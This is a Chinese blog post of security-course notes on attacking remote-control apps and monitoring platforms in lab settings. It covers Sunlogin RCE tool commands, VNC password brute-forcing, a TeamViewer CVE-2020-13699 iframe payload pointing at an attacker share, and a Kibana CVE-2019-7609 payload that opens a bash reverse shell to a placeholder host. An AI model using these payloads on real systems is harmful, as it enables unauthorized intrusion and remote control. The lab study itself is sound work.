第58天-服务攻防-应用协议&设备 Kibana&Zabbix&远控向日葵&VNC&TV


权当备忘记录,存在许多不完善,日后补坑(大概~)


视频链接: 

【小迪安全】红蓝对抗 | 网络攻防 | V2022全栈培训_哔哩哔哩_bilibiliicon-default.png?t=N7T8https://www.bilibili.com/video/BV1pQ4y1s7kH

相关工具:

链接:https://pan.baidu.com/s/1gEVS1iSMKMkrmE_WHTbH-g 
提取码:isok

一.知识点

1.远程控制-第三方应用安全

2.三方应用-向日葵&VNC&TV

3.设备平台-Zabbix&Kibana 漏洞

二.演示案例

1.远程控制-向日葵&Vnc&Teamviewer

2.设备平台-Zabbix-CVE-2022-23131

3.设备平台-Kibana-CVE-2019-7609

案例1:远程控制-向日葵&Vnc&Teamviewer

1.向日葵 CVE-2022-10270 远程代码执行漏洞

简介:向日葵是一款免费的,集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。

影响版本:

        向日葵个人版:windows <=11.0.0.33

        向日葵简约版:<= v1.0.1.43315

下载好向日葵相关版本和exp,地址:https://github.com/Mr-xn/sunlogin_rce

确认在靶机安装好11.0.0.33826版本的向日葵

对靶机40000-60000之间的高位端口进行扫描,找到向日葵开启的存活可疑端口

xrkRce.exe -h ip -t scan

执行命令,可以看到靶机的敏感信息

xrkRce.exe -h ip -t rce -p port "command"

2.VNC 未授权访问漏洞

简介:VNC 全名Virtual Network Console(虚拟网络控制台),是基于 UNXI 和 Linux 的免费开源软件,由 VNC Server 和 VNC Viewer 两部分组成。默认端口号 5900。

靶机下载好VNC Server后,用kall进行端口扫描,可看到5900端口开放,vnc的信息也有显示

靶机打开VNC Server,若这里没设置身份验证的话,可以直接用VNC Viewer连接

VNC Viewer点击Connect

连接成功

若这里选择的是VNC password,会提示设置密码就没有用户名,若选择windows password,就需要靶机的用户和密码才能登录,前者可以使用hydra尝试爆破

设置VNC password

用字典尝试爆破,可以爆破出最后密码为123456abc

设置为Windows password,相当于得使用靶机用户名和密码才能登录

可以看到需要同时输入靶机用户名和密码才能登录

3.Teamviewer CVE-2020-13699

在本机新建一个html文件写入内容如下,启动phpstudy,将其放在phpstudy目录下让靶机可以访问。

<!DOCTYPE html>
<html>
<head>
 <title>cve-2020-13699</title>
</head>
<body>
 <p>Welcome to xiaodi!</p>
 <iframe style="height:1px;width:1px;" src='teamviewer10: --play \\attacker-IP\share\fake.tvs'></iframe>
</body>
</html>


//其中src='teamviewer10: --play \\attacker-IP\share\fake.tvs'为恶意构造的代码,可以修改自己想要的执行命令

靶机访问http://192.168.190.1/TeamViewer.html,点击“打开链接”会自动启动靶机的TeamViewer。

案例2:设备平台-Zabbix-CVE-2022-23131

1.Zabbix CVE-2022-23131 登录绕过漏洞复现

简介:Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。是一款服务器监控软件,其由 server、agent、web 等模块组成,其中 web 模块由 PHP 编写,用来显示数据库中的结果。默认端口:10051。

这个漏洞一般的靶场没有,搭建又非常的麻烦。需通过某些手段进行复现,在fofa找了几圈都是已修复的,这里就看下其他博客学习思路。

【漏洞复现】CVE-2022-23131 Zabbix SAML SSO认证绕过漏洞-CSDN博客icon-default.png?t=N7T8https://blog.csdn.net/weixin_46944519/article/details/123131257

案例3:设备平台-Kibana-CVE-2019-7609

1.Kibana CVE-2019-7609 远程代码执行漏洞

简介:Kibana 为 Elassticsearch 设计的一款开源的视图工具。其 5.6.15 和 6.6.1 之前的版本中存在一处原型链污染漏洞,利用漏洞可以在目标服务器上执行任意代码。默认端口:5601。

受影响版本:

        Kibana < 5.6.15 Kibana < 6.6.1  

打开vulhub的kibana,首先在kibana/CVE-2019-7609/目录下执行sysctl -w vm.max_map_count=262144命令,不然会出现Kibana server is not ready yet错误,之后执行docker-compose up -d启动容器,查看开放的端口为5601

访问url页面

kali进行端口监听

访问kibana,在Timelion模块输入shell,点击右边的三角形,反弹成功

//反弹shell
.es(*).props(label.proto.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/your-ip/your-ip-port 0>&1");process.exit()//') .props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')


//其中your-ip和your-ip-port为需要反弹主机的ip和端口

三.总结 

此次涉及的内容为远程控制的第三方应用软件和一些设备平台,类似的利用思路都差不多。

  • 25
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值